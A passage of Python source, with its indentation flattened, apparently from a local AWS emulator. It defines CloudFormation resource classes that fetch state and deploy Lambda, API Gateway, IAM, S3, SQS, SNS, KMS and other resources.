client = aws_stack.connect_to_service('lambda')
keys = ('FunctionName', 'Role', 'Handler', 'Description', 'Timeout', 'MemorySize', 'Environment', 'Runtime')
update_props = dict([(k, props[k]) for k in keys if k in props])
update_props = self.resolve_refs_recursively(stack_name, update_props, resources)
if 'Timeout' in update_props:
update_props['Timeout'] = int(update_props['Timeout'])
if 'Code' in props:
code = props['Code'] or {}
if not code.get('ZipFile'):
LOG.debug('Updating code for Lambda "%s" from location: %s' % (props['FunctionName'], code))
client.update_function_code(FunctionName=props['FunctionName'], **code)
if 'Environment' in update_props:
environment_variables = update_props['Environment'].get('Variables', {})
update_props['Environment']['Variables'] = {k: str(v) for k, v in environment_variables.items()}
return client.update_function_configuration(**update_props)
class LambdaFunctionVersion(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::Version'
def fetch_state(self, stack_name, resources):
name = self.resolve_refs_recursively(stack_name, self.props.get('FunctionName'), resources)
if not name:
return None
func_name = aws_stack.lambda_function_name(name)
func_version = name.split(':')[7] if len(name.split(':')) > 7 else '$LATEST'
versions = aws_stack.connect_to_service('lambda').list_versions_by_function(FunctionName=func_name)
return ([v for v in versions['Versions'] if v['Version'] == func_version] or [None])[0]
class LambdaEventSourceMapping(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::EventSourceMapping'
def fetch_state(self, stack_name, resources):
props = self.props
resource_id = props['FunctionName'] or self.resource_id
source_arn = props.get('EventSourceArn')
resource_id = self.resolve_refs_recursively(stack_name, resource_id, resources)
source_arn = self.resolve_refs_recursively(stack_name, source_arn, resources)
if not resource_id or not source_arn:
raise Exception('ResourceNotFound')
mappings = aws_stack.connect_to_service('lambda').list_event_source_mappings(
FunctionName=resource_id, EventSourceArn=source_arn)
mapping = list(filter(lambda m:
m['EventSourceArn'] == source_arn and m['FunctionArn'] == aws_stack.lambda_function_arn(resource_id),
mappings['EventSourceMappings']))
if not mapping:
raise Exception('ResourceNotFound')
return mapping[0]
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('UUID')
class LambdaPermission(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::Permission'
def fetch_state(self, stack_name, resources):
iam = aws_stack.connect_to_service('iam')
props = self.props
policy_name = LAMBDA_POLICY_NAME_PATTERN % props.get('FunctionName')
policy_arn = aws_stack.policy_arn(policy_name)
policy = iam.get_policy(PolicyArn=policy_arn)['Policy']
version = policy.get('DefaultVersionId')
policy = iam.get_policy_version(PolicyArn=policy_arn, VersionId=version)['PolicyVersion']
statements = policy['Document']['Statement']
statements = statements if isinstance(statements, list) else [statements]
func_arn = aws_stack.lambda_function_arn(props['FunctionName'])
principal = props.get('Principal')
existing = [s for s in statements if s['Action'] == props['Action'] and
s['Resource'] == func_arn and
(not principal or s['Principal'] in [principal, {'Service': principal}, {'Service': [principal]}])]
return existing[0] if existing else None
def get_physical_resource_id(self, attribute=None, **kwargs):
# return statement ID here to indicate that the resource has been deployed
return self.props.get('Sid')
class LambdaEventInvokeConfig(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::EventInvokeConfig'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('lambda')
props = self.props
result = client.get_function_event_invoke_config(
FunctionName=props.get('FunctionName'), Qualifier=props.get('FunctionName', '$LATEST'))
return result
def get_physical_resource_id(self, attribute=None, **kwargs):
props = self.props
return 'lambdaconfig-%s-%s' % (props.get('FunctionName'), props.get('Qualifier'))
def get_deploy_templates():
return {
'create': {
'function': 'put_function_event_invoke_config'
},
'delete': {
'function': 'delete_function_event_invoke_config',
'parameters': {
'FunctionName': 'FunctionName',
'Qualifier': 'Qualifier'
}
}
}
class ElasticsearchDomain(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Elasticsearch::Domain'
def get_physical_resource_id(self, attribute=None, **kwargs):
domain_name = self._domain_name()
if attribute == 'Arn':
return aws_stack.elasticsearch_domain_arn(domain_name)
return domain_name
def fetch_state(self, stack_name, resources):
domain_name = self._domain_name()
domain_name = self.resolve_refs_recursively(stack_name, domain_name, resources)
return aws_stack.connect_to_service('es').describe_elasticsearch_domain(DomainName=domain_name)
def _domain_name(self):
return self.props.get('DomainName') or self.resource_id
class FirehoseDeliveryStream(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::KinesisFirehose::DeliveryStream'
def fetch_state(self, stack_name, resources):
stream_name = self.props.get('DeliveryStreamName') or self.resource_id
stream_name = self.resolve_refs_recursively(stack_name, stream_name, resources)
return aws_stack.connect_to_service('firehose').describe_delivery_stream(DeliveryStreamName=stream_name)
class KinesisStream(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Kinesis::Stream'
def get_physical_resource_id(self, attribute=None, **kwargs):
return aws_stack.kinesis_stream_arn(self.props.get('Name'))
def fetch_state(self, stack_name, resources):
stream_name = self.resolve_refs_recursively(stack_name, self.props['Name'], resources)
result = aws_stack.connect_to_service('kinesis').describe_stream(StreamName=stream_name)
return result
class KinesisStreamConsumer(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Kinesis::StreamConsumer'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('ConsumerARN')
def fetch_state(self, stack_name, resources):
props = self.props
stream_arn = self.resolve_refs_recursively(stack_name, props['StreamARN'], resources)
result = aws_stack.connect_to_service('kinesis').list_stream_consumers(StreamARN=stream_arn)
result = [r for r in result['Consumers'] if r['ConsumerName'] == props['ConsumerName']]
return (result or [None])[0]
def get_deploy_templates():
return {
'create': {
'function': 'register_stream_consumer'
},
'delete': {
'function': 'deregister_stream_consumer'
}
}
class Route53RecordSet(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Route53::RecordSet'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('Name') # Ref attribute is the domain name itself
def fetch_state(self, stack_name, resources):
route53 = aws_stack.connect_to_service('route53')
props = self.props
result = route53.list_resource_record_sets(HostedZoneId=props['HostedZoneId'])['ResourceRecordSets']
result = [r for r in result if r['Name'] == props['Name'] and r['Type'] == props['Type']]
return (result or [None])[0]
def get_deploy_templates():
def param_change_batch(params, **kwargs):
attr_names = ['Name', 'Type', 'SetIdentifier', 'Weight', 'Region', 'GeoLocation',
'Failover', 'MultiValueAnswer', 'TTL', 'ResourceRecords', 'AliasTarget', 'HealthCheckId']
attrs = select_attributes(params, attr_names)
alias_target = attrs.get('AliasTarget', {})
alias_target['EvaluateTargetHealth'] = alias_target.get('EvaluateTargetHealth', False)
return {
'Comment': params.get('Comment', ''),
'Changes': [{
'Action': 'CREATE',
'ResourceRecordSet': attrs
}]
}
return {
'create': {
'function': 'change_resource_record_sets',
'parameters': {
'HostedZoneId': 'HostedZoneId',
'ChangeBatch': param_change_batch
}
}
}
class SFNStateMachine(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::StepFunctions::StateMachine'
def get_resource_name(self):
return self.props.get('StateMachineName')
def fetch_state(self, stack_name, resources):
sm_name = self.props.get('StateMachineName') or self.resource_id
sm_name = self.resolve_refs_recursively(stack_name, sm_name, resources)
sfn_client = aws_stack.connect_to_service('stepfunctions')
state_machines = sfn_client.list_state_machines()['stateMachines']
sm_arn = [m['stateMachineArn'] for m in state_machines if m['name'] == sm_name]
if not sm_arn:
return None
result = sfn_client.describe_state_machine(stateMachineArn=sm_arn[0])
return result
def update_resource(self, new_resource, stack_name, resources):
props = new_resource['Properties']
client = aws_stack.connect_to_service('stepfunctions')
sm_arn = self.props.get('stateMachineArn')
if not sm_arn:
self.state = self.fetch_state(stack_name=stack_name, resources=resources)
sm_arn = self.state['stateMachineArn']
kwargs = {
'stateMachineArn': sm_arn,
'definition': props['DefinitionString'],
}
return client.update_state_machine(**kwargs)
class SFNActivity(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::StepFunctions::Activity'
def fetch_state(self, stack_name, resources):
activity_arn = self.physical_resource_id
if not activity_arn:
return None
client = aws_stack.connect_to_service('stepfunctions')
result = client.describe_activity(activityArn=activity_arn)
return result
class IAMRole(GenericBaseModel, MotoRole):
@staticmethod
def cloudformation_type():
return 'AWS::IAM::Role'
def get_resource_name(self):
return self.props.get('RoleName')
def fetch_state(self, stack_name, resources):
role_name = self.resolve_refs_recursively(stack_name, self.props.get('RoleName'), resources)
return aws_stack.connect_to_service('iam').get_role(RoleName=role_name)['Role']
def update_resource(self, new_resource, stack_name, resources):
props = new_resource['Properties']
client = aws_stack.connect_to_service('iam')
return client.update_role(RoleName=props.get('RoleName'), Description=props.get('Description') or '')
class IAMPolicy(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::IAM::Policy'
def fetch_state(self, stack_name, resources):
return IAMPolicy.get_policy_state(self, stack_name, resources, managed_policy=False)
@classmethod
def get_deploy_templates(cls):
def _create(resource_id, resources, resource_type, func, stack_name, *args, **kwargs):
iam = aws_stack.connect_to_service('iam')
props = resources[resource_id]['Properties']
cls.resolve_refs_recursively(stack_name, props, resources)
policy_doc = json.dumps(remove_none_values(props['PolicyDocument']))
policy_name = props['PolicyName']
for role in props.get('Roles', []):
iam.put_role_policy(RoleName=role, PolicyName=policy_name, PolicyDocument=policy_doc)
for user in props.get('Users', []):
iam.put_user_policy(UserName=user, PolicyName=policy_name, PolicyDocument=policy_doc)
for group in props.get('Groups', []):
iam.put_group_policy(GroupName=group, PolicyName=policy_name, PolicyDocument=policy_doc)
return {}
return {'create': {'function': _create}}
@staticmethod
def get_policy_state(obj, stack_name, resources, managed_policy=False):
def _filter(pols):
return [p for p in pols['AttachedPolicies'] if p['PolicyName'] == policy_name]
iam = aws_stack.connect_to_service('iam')
props = obj.props
policy_name = props.get('PolicyName') or props.get('ManagedPolicyName')
result = {}
roles = props.get('Roles', [])
users = props.get('Users', [])
groups = props.get('Groups', [])
if managed_policy:
result['policy'] = iam.get_policy(PolicyArn=aws_stack.policy_arn(policy_name))
for role in roles:
role = obj.resolve_refs_recursively(stack_name, role, resources)
policies = (_filter(iam.list_attached_role_policies(RoleName=role)) if managed_policy else
iam.get_role_policy(RoleName=role, PolicyName=policy_name))
result['role:%s' % role] = policies
for user in users:
user = obj.resolve_refs_recursively(stack_name, user, resources)
policies = (_filter(iam.list_attached_user_policies(UserName=user)) if managed_policy else
iam.get_user_policy(UserName=user, PolicyName=policy_name))
result['user:%s' % user] = policies
for group in groups:
group = obj.resolve_refs_recursively(stack_name, group, resources)
policies = (_filter(iam.list_attached_group_policies(GroupName=group)) if managed_policy else
iam.get_group_policy(GroupName=group, PolicyName=policy_name))
result['group:%s' % group] = policies
result = {k: v for k, v in result.items() if v}
return result or None
class IAMManagedPolicy(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::IAM::ManagedPolicy'
def get_physical_resource_id(self, attribute=None, **kwargs):
return aws_stack.role_arn(self.props['ManagedPolicyName'])
def fetch_state(self, stack_name, resources):
return IAMPolicy.get_policy_state(self, stack_name, resources, managed_policy=True)
@classmethod
def get_deploy_templates(cls):
def _create(resource_id, resources, resource_type, func, stack_name, *args, **kwargs):
iam = aws_stack.connect_to_service('iam')
resource = resources[resource_id]
props = resource['Properties']
cls.resolve_refs_recursively(stack_name, props, resources)
policy_doc = json.dumps(props['PolicyDocument'])
policy = iam.create_policy(PolicyName=props['ManagedPolicyName'], PolicyDocument=policy_doc)
policy_arn = policy['Policy']['Arn']
for role in resource.get('Roles', []):
iam.attach_role_policy(RoleName=role, PolicyArn=policy_arn)
for user in resource.get('Users', []):
iam.attach_user_policy(UserName=user, PolicyArn=policy_arn)
for group in resource.get('Groups', []):
iam.attach_group_policy(GroupName=group, PolicyArn=policy_arn)
return {}
return {'create': {'function': _create}}
class GatewayResponse(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::GatewayResponse'
def fetch_state(self, stack_name, resources):
props = self.props
api_id = self.resolve_refs_recursively(stack_name, props['RestApiId'], resources)
if not api_id:
return
client = aws_stack.connect_to_service('apigateway')
result = client.get_gateway_response(restApiId=api_id, responseType=props['ResponseType'])
return result if 'responseType' in result else None
class GatewayRestAPI(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::RestApi'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('id')
def fetch_state(self, stack_name, resources):
apis = aws_stack.connect_to_service('apigateway').get_rest_apis()['items']
api_name = self.props.get('Name') or self.resource_id
api_name = self.resolve_refs_recursively(stack_name, api_name, resources)
result = list(filter(lambda api: api['name'] == api_name, apis))
return result[0] if result else None
@staticmethod
def get_deploy_templates():
def _api_id(params, resources, resource_id, **kwargs):
resource = GatewayRestAPI(resources[resource_id])
return resource.physical_resource_id or resource.get_physical_resource_id()
return {
'create': {
'function': 'create_rest_api',
'parameters': {
'name': 'Name',
'description': 'Description'
}
},
'delete': {
'function': 'delete_rest_api',
'parameters': {
'restApiId': _api_id,
}
}
}
class GatewayDeployment(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::Deployment'
def fetch_state(self, stack_name, resources):
api_id = self.props.get('RestApiId') or self.resource_id
api_id = self.resolve_refs_recursively(stack_name, api_id, resources)
if not api_id:
return None
result = aws_stack.connect_to_service('apigateway').get_deployments(restApiId=api_id)['items']
# TODO possibly filter results by stage name or other criteria
return result[0] if result else None
class GatewayResource(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::Resource'
def fetch_state(self, stack_name, resources):
props = self.props
api_id = props.get('RestApiId') or self.resource_id
api_id = self.resolve_refs_recursively(stack_name, api_id, resources)
parent_id = self.resolve_refs_recursively(stack_name, props.get('ParentId'), resources)
if not api_id or not parent_id:
return None
api_resources = aws_stack.connect_to_service('apigateway').get_resources(restApiId=api_id)['items']
target_resource = list(filter(lambda res:
res.get('parentId') == parent_id and res['pathPart'] == props['PathPart'], api_resources))
if not target_resource:
return None
path = aws_stack.get_apigateway_path_for_resource(api_id,
target_resource[0]['id'], resources=api_resources)
result = list(filter(lambda res: res['path'] == path, api_resources))
return result[0] if result else None
class GatewayMethod(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::Method'
def fetch_state(self, stack_name, resources):
props = self.props
api_id = self.resolve_refs_recursively(stack_name, props['RestApiId'], resources)
res_id = self.resolve_refs_recursively(stack_name, props['ResourceId'], resources)
if not api_id or not res_id:
return None
res_obj = aws_stack.connect_to_service('apigateway').get_resource(restApiId=api_id, resourceId=res_id)
match = [v for (k, v) in res_obj.get('resourceMethods', {}).items()
if props['HttpMethod'] in (v.get('httpMethod'), k)]
int_props = props.get('Integration') or {}
if int_props.get('Type') == 'AWS_PROXY':
match = [m for m in match if
m.get('methodIntegration', {}).get('type') == 'AWS_PROXY' and
m.get('methodIntegration', {}).get('httpMethod') == int_props.get('IntegrationHttpMethod')]
return match[0] if match else None
def update_resource(self, new_resource, stack_name, resources):
props = new_resource['Properties']
client = aws_stack.connect_to_service('apigateway')
integration = props.get('Integration')
kwargs = {
'restApiId': props['RestApiId'],
'resourceId': props['ResourceId'],
'httpMethod': props['HttpMethod'],
'requestParameters': props.get('RequestParameters') or {}
}
if integration:
kwargs['type'] = integration['Type']
if integration.get('IntegrationHttpMethod'):
kwargs['integrationHttpMethod'] = integration.get('IntegrationHttpMethod')
if integration.get('Uri'):
kwargs['uri'] = integration.get('Uri')
return client.put_integration(**kwargs)
kwargs['authorizationType'] = props.get('AuthorizationType')
return client.put_method(**kwargs)
def get_physical_resource_id(self, attribute=None, **kwargs):
props = self.props
result = '%s-%s-%s' % (props.get('RestApiId'), props.get('ResourceId'), props.get('HttpMethod'))
return result
class GatewayStage(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::Stage'
def fetch_state(self, stack_name, resources):
api_id = self.props.get('RestApiId') or self.resource_id
api_id = self.resolve_refs_recursively(stack_name, api_id, resources)
if not api_id:
return None
result = aws_stack.connect_to_service('apigateway').get_stage(restApiId=api_id,
stageName=self.props['StageName'])
return result
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('id')
class GatewayUsagePlan(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::UsagePlan'
def fetch_state(self, stack_name, resources):
plan_name = self.props.get('UsagePlanName')
plan_name = self.resolve_refs_recursively(stack_name, plan_name, resources)
result = aws_stack.connect_to_service('apigateway').get_usage_plans().get('items', [])
result = [r for r in result if r['name'] == plan_name]
return (result or [None])[0]
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'create_usage_plan',
'parameters': {
'name': 'UsagePlanName',
'description': 'Description',
'apiStages': lambda_keys_to_lower('ApiStages'),
'quota': lambda_keys_to_lower('Quota'),
'throttle': lambda_keys_to_lower('Throttle'),
'tags': params_list_to_dict('Tags')
}
}
}
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('id')
class GatewayApiKey(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::ApiKey'
def fetch_state(self, stack_name, resources):
props = self.props
key_name = self.resolve_refs_recursively(stack_name, props.get('Name'), resources)
cust_id = props.get('CustomerId')
result = aws_stack.connect_to_service('apigateway').get_api_keys().get('items', [])
result = [r for r in result if r.get('name') == key_name and cust_id in (None, r.get('customerId'))]
return (result or [None])[0]
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'create_api_key',
'parameters': {
'description': 'Description',
'customerId': 'CustomerId',
'name': 'Name',
'value': 'Value',
'enabled': 'Enabled',
'stageKeys': lambda_keys_to_lower('StageKeys'),
'tags': params_list_to_dict('Tags')
},
'types': {
'enabled': bool
}
}
}
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('id')
class GatewayUsagePlanKey(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::UsagePlanKey'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('apigateway')
key_id = self.resolve_refs_recursively(stack_name, self.props.get('KeyId'), resources)
key_type = self.resolve_refs_recursively(stack_name, self.props.get('KeyType'), resources)
plan_id = self.resolve_refs_recursively(stack_name, self.props.get('UsagePlanId'), resources)
result = client.get_usage_plan_keys(usagePlanId=plan_id).get('items', [])
result = [r for r in result if r['id'] == key_id and key_type in [None, r.get('type')]]
return (result or [None])[0]
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'create_usage_plan_key',
'parameters': lambda_keys_to_lower()
}
}
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('id')
class GatewayModel(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::Model'
class GatewayAccount(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::Account'
class S3Bucket(GenericBaseModel, FakeBucket):
def get_resource_name(self):
return self.normalize_bucket_name(self.props.get('BucketName'))
@staticmethod
def normalize_bucket_name(bucket_name):
bucket_name = bucket_name or ''
# AWS automatically converts upper to lower case chars in bucket names
bucket_name = bucket_name.lower()
return bucket_name
@staticmethod
def get_deploy_templates():
def convert_acl_cf_to_s3(acl):
""" Convert a CloudFormation ACL string (e.g., 'PublicRead') to an S3 ACL string (e.g., 'public-read') """
return re.sub('(?<!^)(?=[A-Z])', '-', acl).lower()
def s3_bucket_notification_config(params, **kwargs):
notif_config = params.get('NotificationConfiguration')
if not notif_config:
return None
lambda_configs = []
queue_configs = []
topic_configs = []
attr_tuples = (
('LambdaConfigurations', lambda_configs, 'LambdaFunctionArn', 'Function'),
('QueueConfigurations', queue_configs, 'QueueArn', 'Queue'),
('TopicConfigurations', topic_configs, 'TopicArn', 'Topic')
)
# prepare lambda/queue/topic notification configs
for attrs in attr_tuples:
for notif_cfg in notif_config.get(attrs[0]) or []:
filter_rules = notif_cfg.get('Filter', {}).get('S3Key', {}).get('Rules')
entry = {
attrs[2]: notif_cfg[attrs[3]],
'Events': [notif_cfg['Event']]
}
if filter_rules:
entry['Filter'] = {'Key': {'FilterRules': filter_rules}}
attrs[1].append(entry)
# construct final result
result = {
'Bucket': params.get('BucketName') or PLACEHOLDER_RESOURCE_NAME,
'NotificationConfiguration': {
'LambdaFunctionConfigurations': lambda_configs,
'QueueConfigurations': queue_configs,
'TopicConfigurations': topic_configs
}
}
return result
def get_bucket_location_config(**kwargs):
region = aws_stack.get_region()
if region == AWS_REGION_US_EAST_1:
return None
return {'LocationConstraint': region}
result = {
'create': [{
'function': 'create_bucket',
'parameters': {
'Bucket': ['BucketName', PLACEHOLDER_RESOURCE_NAME],
'ACL': lambda params, **kwargs: convert_acl_cf_to_s3(params.get('AccessControl', 'PublicRead')),
'CreateBucketConfiguration': lambda params, **kwargs: get_bucket_location_config()
}
}, {
'function': 'put_bucket_notification_configuration',
'parameters': s3_bucket_notification_config
}],
'delete': [{
'function': 'delete_bucket',
'parameters': {
'Bucket': 'BucketName'
}
}]
}
return result
def fetch_state(self, stack_name, resources):
props = self.props
bucket_name = props.get('BucketName') or self.resource_id
bucket_name = self.resolve_refs_recursively(stack_name, bucket_name, resources)
bucket_name = self.normalize_bucket_name(bucket_name)
s3_client = aws_stack.connect_to_service('s3')
response = s3_client.get_bucket_location(Bucket=bucket_name)
notifs = props.get('NotificationConfiguration')
if not response or not notifs:
return response
configs = s3_client.get_bucket_notification_configuration(Bucket=bucket_name)
has_notifs = (configs.get('TopicConfigurations') or configs.get('QueueConfigurations') or
configs.get('LambdaFunctionConfigurations'))
if notifs and not has_notifs:
return None
return response
def get_cfn_attribute(self, attribute_name):
if attribute_name in ['DomainName', 'RegionalDomainName']:
return LOCALHOST
return super(S3Bucket, self).get_cfn_attribute(attribute_name)
class S3BucketPolicy(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::S3::BucketPolicy'
def fetch_state(self, stack_name, resources):
bucket_name = self.props.get('Bucket') or self.resource_id
bucket_name = self.resolve_refs_recursively(stack_name, bucket_name, resources)
return aws_stack.connect_to_service('s3').get_bucket_policy(Bucket=bucket_name)
class SQSQueue(GenericBaseModel, MotoQueue):
@staticmethod
def cloudformation_type():
return 'AWS::SQS::Queue'
def get_resource_name(self):
return self.props.get('QueueName')
def get_physical_resource_id(self, attribute=None, **kwargs):
queue_url = None
props = self.props
try:
queue_url = aws_stack.get_sqs_queue_url(props.get('QueueName'))
except Exception as e:
if 'NonExistentQueue' in str(e):
raise DependencyNotYetSatisfied(resource_ids=self.resource_id, message='Unable to get queue: %s' % e)
if attribute == 'Arn':
return aws_stack.sqs_queue_arn(props.get('QueueName'))
return queue_url
def fetch_state(self, stack_name, resources):
queue_name = self.resolve_refs_recursively(stack_name, self.props['QueueName'], resources)
sqs_client = aws_stack.connect_to_service('sqs')
queues = sqs_client.list_queues()
result = list(filter(lambda item:
# TODO possibly find a better way to compare resource_id with queue URLs
item.endswith('/%s' % queue_name), queues.get('QueueUrls', [])))
if not result:
return None
result = sqs_client.get_queue_attributes(QueueUrl=result[0], AttributeNames=['All'])['Attributes']
result['Arn'] = result['QueueArn']
return result
@staticmethod
def get_deploy_templates():
def _queue_url(params, resources, resource_id, **kwargs):
resource = SQSQueue(resources[resource_id])
props = resource.props
queue_url = resource.physical_resource_id or props.get('QueueUrl')
if queue_url:
return queue_url
return aws_stack.sqs_queue_url_for_arn(props['QueueArn'])
return {
'create': {
'function': 'create_queue',
'parameters': {
'QueueName': ['QueueName', PLACEHOLDER_RESOURCE_NAME],
'Attributes': params_select_attributes(
'ContentBasedDeduplication', 'DelaySeconds', 'FifoQueue', 'MaximumMessageSize',
'MessageRetentionPeriod', 'VisibilityTimeout', 'RedrivePolicy', 'ReceiveMessageWaitTimeSeconds'
),
'tags': params_list_to_dict('Tags')
}
},
'delete': {
'function': 'delete_queue',
'parameters': {
'QueueUrl': _queue_url
}
}
}
class SNSTopic(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::SNS::Topic'
def get_physical_resource_id(self, attribute=None, **kwargs):
return aws_stack.sns_topic_arn(self.props['TopicName'])
def fetch_state(self, stack_name, resources):
topic_name = self.resolve_refs_recursively(stack_name, self.props['TopicName'], resources)
topics = aws_stack.connect_to_service('sns').list_topics()
result = list(filter(lambda item: item['TopicArn'].split(':')[-1] == topic_name, topics.get('Topics', [])))
return result[0] if result else None
@staticmethod
def get_deploy_templates():
def _topic_arn(params, resources, resource_id, **kwargs):
resource = SNSTopic(resources[resource_id])
return resource.physical_resource_id or resource.get_physical_resource_id()
return {
'create': {
'function': 'create_topic',
'parameters': {
'Name': 'TopicName',
'Tags': 'Tags'
}
},
'delete': {
'function': 'delete_topic',
'parameters': {
'TopicArn': _topic_arn
}
}
}
class SNSSubscription(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::SNS::Subscription'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('SubscriptionArn')
def fetch_state(self, stack_name, resources):
props = self.props
topic_arn = props.get('TopicArn')
topic_arn = self.resolve_refs_recursively(stack_name, topic_arn, resources)
if topic_arn is None:
return
subs = aws_stack.connect_to_service('sns').list_subscriptions_by_topic(TopicArn=topic_arn)
result = [sub for sub in subs['Subscriptions'] if
props.get('Protocol') == sub['Protocol'] and props.get('Endpoint') == sub['Endpoint']]
# TODO: use get_subscription_attributes to compare FilterPolicy
return result[0] if result else None
@staticmethod
def get_deploy_templates():
def sns_subscription_arn(params, resources, resource_id, **kwargs):
resource = resources[resource_id]
return resource['PhysicalResourceId']
def sns_subscription_params(params, **kwargs):
def attr_val(val):
return json.dumps(val) if isinstance(val, (dict, list)) else str(val)
attrs = ['DeliveryPolicy', 'FilterPolicy', 'RawMessageDelivery', 'RedrivePolicy']
result = dict([(a, attr_val(params[a])) for a in attrs if a in params])
return result
return {
'create': {
'function': 'subscribe',
'parameters': {
'TopicArn': 'TopicArn',
'Protocol': 'Protocol',
'Endpoint': 'Endpoint',
'Attributes': sns_subscription_params
}
},
'delete': {
'function': 'unsubscribe',
'parameters': {
'SubscriptionArn': sns_subscription_arn
}
}
}
class DynamoDBTable(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::DynamoDB::Table'
def get_physical_resource_id(self, attribute=None, **kwargs):
table_name = self.props.get('TableName')
if attribute in REF_ID_ATTRS:
return table_name
return aws_stack.dynamodb_table_arn(table_name)
def fetch_state(self, stack_name, resources):
table_name = self.props.get('TableName') or self.resource_id
table_name = self.resolve_refs_recursively(stack_name, table_name, resources)
return aws_stack.connect_to_service('dynamodb').describe_table(TableName=table_name)
class QueuePolicy(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::SQS::QueuePolicy'
class SSMParameter(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::SSM::Parameter'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('Name') or self.resource_id
def fetch_state(self, stack_name, resources):
param_name = self.props.get('Name') or self.resource_id
param_name = self.resolve_refs_recursively(stack_name, param_name, resources)
return aws_stack.connect_to_service('ssm').get_parameter(Name=param_name)['Parameter']
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'put_parameter',
'parameters': merge_parameters(params_dict_to_list('Tags', wrapper='Tags'), select_parameters(
'Name', 'Type', 'Value', 'Description', 'AllowedPattern', 'Policies', 'Tier'))
}
}
class SecretsManagerSecret(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::SecretsManager::Secret'
def fetch_state(self, stack_name, resources):
secret_name = self.props.get('Name') or self.resource_id
secret_name = self.resolve_refs_recursively(stack_name, secret_name, resources)
result = aws_stack.connect_to_service('secretsmanager').describe_secret(SecretId=secret_name)
return result
class KMSKey(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::KMS::Key'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('kms')
physical_res_id = self.physical_resource_id
props = self.props
res_tags = props.get('Tags', [])
if not physical_res_id:
# TODO: find a more efficient approach for this?
for key in client.list_keys()['Keys']:
details = client.describe_key(KeyId=key['KeyId'])['KeyMetadata']
tags = client.list_resource_tags(KeyId=key['KeyId']).get('Tags', [])
tags = [{'Key': tag['TagKey'], 'Value': tag['TagValue']} for tag in tags]
if (tags == res_tags and details.get('Description') == props.get('Description') and
props.get('KeyUsage') in [None, details.get('KeyUsage')]):
physical_res_id = key['KeyId']
# TODO should this be removed from here? It seems that somewhere along the execution
# chain the 'PhysicalResourceId' gets overwritten with None, hence setting it here
self.resource_json['PhysicalResourceId'] = physical_res_id
break
if not physical_res_id:
return
return client.describe_key(KeyId=physical_res_id)
def get_physical_resource_id(self, attribute=None, **kwargs):
if attribute in REF_ID_ATTRS:
return self.physical_resource_id
return self.physical_resource_id and aws_stack.kms_key_arn(self.physical_resource_id)
@staticmethod
def get_deploy_templates():
def create_params(params, **kwargs):
return {
'Policy': params.get('KeyPolicy'),
'Tags': [{'TagKey': tag['Key'], 'TagValue': tag['Value']} for tag in params.get('Tags', [])]
}
return {
'create': {
'function': 'create_key',
'parameters': create_params
},
'delete': {
# TODO Key needs to be deleted in KMS backend
'function': 'schedule_key_deletion',
'parameters': {
'KeyId': 'PhysicalResourceId'
}
}
}
class KMSAlias(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::KMS::Alias'
def fetch_state(self, stack_name, resources):
kms = aws_stack.connect_to_service('kms')
aliases = kms.list_aliases()['Aliases']
for alias in aliases:
if alias['AliasName'] == self.props.get('AliasName'):
return alias
return None
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'create_alias',
'parameters': {
'AliasName': 'AliasName',
'TargetKeyId': 'TargetKeyId'
}
},
'delete': {
'function': 'delete_alias',
'parameters': {
'AliasName': 'AliasName'
}
},
}
class EC2Instance(GenericBaseModel):
@staticmethod
def cloudformation_type():
